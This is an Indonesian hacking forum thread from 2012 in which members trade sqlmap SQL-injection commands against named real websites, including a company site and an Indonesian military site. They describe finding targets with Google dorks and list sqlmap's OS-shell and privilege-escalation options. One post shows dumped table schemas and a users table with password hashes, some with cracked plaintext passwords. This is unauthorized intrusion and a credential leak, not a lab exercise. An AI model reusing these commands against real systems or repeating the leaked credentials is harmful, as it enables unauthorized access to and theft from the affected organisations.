SQLi Sqlmap.py
#61
ok om Big Grin
<< back|track'ers newbee

#62
(03-22-2012, 07:22 PM)fake666 Wrote: ok om Big Grin

ok,,yuk mari mulai,,kita bahas apa dulu Smile
nah ane ada vulner ni

C:\sqlmap>sqlmap.py -u http://www.altechna.com:80/product_details.php?id=374 --random-agent --threads 5 -D altechna2 -T additional_user --columns

niat coba?

koneksi ku g terlalu kuat buat inject wkwkwk

#63
(03-22-2012, 11:18 PM)junior.riau18 Wrote:
(03-22-2012, 07:22 PM)fake666 Wrote: ok om Big Grin

ok,,yuk mari mulai,,kita bahas apa dulu Smile
nah ane ada vulner ni

C:\sqlmap>sqlmap.py -u http://www.altechna.com:80/product_details.php?id=374 --random-agent --threads 5 -D altechna2 -T additional_user --columns

niat coba?

koneksi ku g terlalu kuat buat inject wkwkwk
ayok om??
mau coba punya ane juga gak??
python sqlmap.py -u "www.tni.mil.id/index2.php?page=datagallery.html&gctg_code=27" --random-agent --threads 10 --dbs


oh iya mau nany juga..si om nyari vulnernya pake apa?
<< back|track'ers newbee

#64
om g ada yang lebih seram targetnya -____-" tni mak jank wkwkw

pakek google google dork,,biasa kan buat nya inurl:product.php?id=

nah ane g pakek inurl,,langsung product.php?id=,,terserah kita si,,itu mainan imajinasi aja Smile
nah selesai inject kita cba yang ente maksud
ini dia optionnya :

Code:
--os-cmd=OSCMD      Execute an operating system command
--os-shell          Prompt for an interactive operating system shell
--os-pwn            Prompt for an out-of-band shell, meterpreter or VN
--os-smbrelay       One click prompt for an OOB shell, meterpreter or
--os-bof            Stored procedure buffer overflow exploitation
--priv-esc          Database process' user privilege escalation
--msf-path=MSFPATH  Local path where Metasploit Framework is installed
--tmp-path=TMPPATH  Remote absolute path of temporary files directory

#65
akwkawa
dari pada kemarin polri akwkaw Smile
tapi itu adminnya cuman disable klik kanan gak ngepacth sistimnya ya ane test aja ==
nunggu si om dulu akwkaw sekalian om bikinin tutorialnya Big Grin
<< back|track'ers newbee

#66
surem dah ente Big Grin bisa di bom ane wkwkwk pakek target ane aja gimana??target luar lebih aman sedikit Tongue

silahkan didump dulu ajah Big Grin
untuk tabel ganti aja langsung ke tabel "users"
ilangin kutipnya ya

#67
akwka ini aja lagi gemeteran..

oke omm lagi di liat2 nih isinya
<< back|track'ers newbee

#68
makanya jangan yang aneh2 dah wkwkwkwkkw
kalo dah kelar dump tbl users post dimari atau pm ane aja Tongue

#69
Database: altechna2
Table: adminlog
[6 columns]
+-----------+--------------+
| Column | Type |
+-----------+--------------+
| action | varchar(255) |
| item_id | int(11) |
| item_name | varchar(50) |
| timestamp | int(11) |
| user_id | int(11) |
| username | varchar(25) |
+-----------+--------------+

Database: altechna2
Table: additional_users
[4 columns]
+---------------------+---------+
| Column | Type |
+---------------------+---------+
| additional_users_id | int(11) |
| content_id | int(11) |
| page_id | int(11) |
| user_id | int(11) |
+---------------------+---------+


Database: altechna2
Table: additional_users
[0 entries]
+---------------------+
| additional_users_id |
+---------------------+
+---------------------+


no found something ==
ad yang mau coba juga ?
maaf tadi salah ada ada om junior.riau18
nih dia

Database: altechna2
Table: users
[3 entries]
+--------------------------------------------+------------+
| password | username |
+--------------------------------------------+------------+
| f49e49c743ab7195b10386bef8ac9943 | mediaforma |
| c9330587565205a5b8345f60c620ecc6 (editor1) | editor |
| 6acb0784b9dde050a12dc69edc69b45f (namas) | admin |
+--------------------------------------------+------------+

tapi gak bisa login
arghh==
<< back|track'ers newbee

#70
pakek tabl users,,ada 70 tabel disana om Tongue
kalo g percaya coba aja bbuat -D altechna2 --tables,,
ntarlihat berapa banyak blikan tabelnya wkwkkw






Users browsing this thread: 1 Guest(s)